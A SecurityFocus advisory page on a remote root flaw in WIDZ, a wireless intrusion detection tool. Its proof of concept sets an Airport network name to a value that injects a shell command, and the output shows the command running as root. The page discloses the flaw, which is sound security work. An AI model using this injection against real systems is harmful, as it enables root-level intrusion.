Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

WIDZ Remote Root Compromise Vulnerability

The following proof of concept was provided:

Go to Apple Airport and set network name to ';/usr/bin/id;

This will generate the following message:
unknown AP essid=
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh: -c: line 3: unexpected EOF while looking for matching `''
sh: -c: line 4: syntax error: unexpected end of file







 

Privacy Statement
Copyright 2009, SecurityFocus